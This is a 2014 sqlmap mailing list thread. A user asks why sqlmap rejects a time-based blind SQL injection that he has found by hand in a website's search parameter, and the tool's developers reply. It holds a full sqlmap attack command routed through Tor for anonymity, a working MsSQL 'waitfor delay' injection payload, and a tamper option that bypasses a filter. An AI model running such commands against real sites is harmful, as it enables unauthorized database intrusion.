1) "waitfor delay '0:0:0'" makes no delay and ​"waitfor delay '0:0:5'"
makes5 seconds delay and so on.
2) I tried again with --tamper=between​ and sqlmap verified the
vulnerability.
3) using the tor in timebased techniques is not the best choice but I
preferred to be anonymous in pentesting.
Best Regards
On Mon, Dec 8, 2014 at 2:38 PM, Miroslav Stampar <miroslav.stam...@gmail.com
> wrote:
> For sure it is. sqlmap gives you a huge nagging message in such case
> (network latency...blaballa).
>
> Bye
>
> On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <robin@digi.ninja> wrote:
>
>> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>>
>> Robin
>>
>> On 8 December 2014 at 11:00, Miroslav Stampar
>> <miroslav.stam...@gmail.com> wrote:
>> > Hi.
>> >
>> > 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
>> > 2) sqlmap says "false positive or unexploitable injection point
>> detected".
>> > Is there a possibility that the character > is filtered?
>> > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries
>> to use
>> > in "false positive check" phase. Then you'll see what fails.
>> >
>> > Bye
>> >
>> > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hooshman...@gmail.com>
>> wrote:
>> >>
>> >> Hi,
>> >>
>> >> There is a website that vulnerable to SQL injection. I have checked and
>> >> I'm sure there is blind sql injection vulnerability but the sqlmap
>> could not
>> >> find this.
>> >> I tried this command:
>> >> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5
>> --random-agent
>> >> --risk 3 --level 3 --technique=T --dbms="MsSQL"
>> >> and the output was something like this:
>> >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
>> >> time-based blind' injectable
>> >> [INFO] checking if the injection point on GET parameter 'search' is a
>> >> false positive
>> >> [WARNING] false positive or unexploitable injection point detected
>> >> [WARNING] GET parameter 'search' is not injectable
>> >>
>> >>
>> >> the "search" parameter is vulnerable to this payload: '); waitfor delay
>> >> '0:0:0' --
>> >>
>> >> Did I make a mistake or the sqlmap did not find that?
>> >>
>> >> Best Regards
>> >>
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> >> from Actuate! Instantly Supercharge Your Business Reports and
>> Dashboards
>> >> with Interactivity, Sharing, Native Excel Exports, App Integration &
>> more
>> >> Get technology previously reserved for billion-dollar corporations,
>> FREE
>> >>
>> >>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sqlmap-users@lists.sourceforge.net
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> > from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> > with Interactivity, Sharing, Native Excel Exports, App Integration &
>> more
>> > Get technology previously reserved for billion-dollar corporations, FREE
>> >
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sqlmap-users@lists.sourceforge.net
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
http://about.me/hooshmand
Public Key <http://scriptics.ir/pub_key/hooshmand_pub.asc>
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
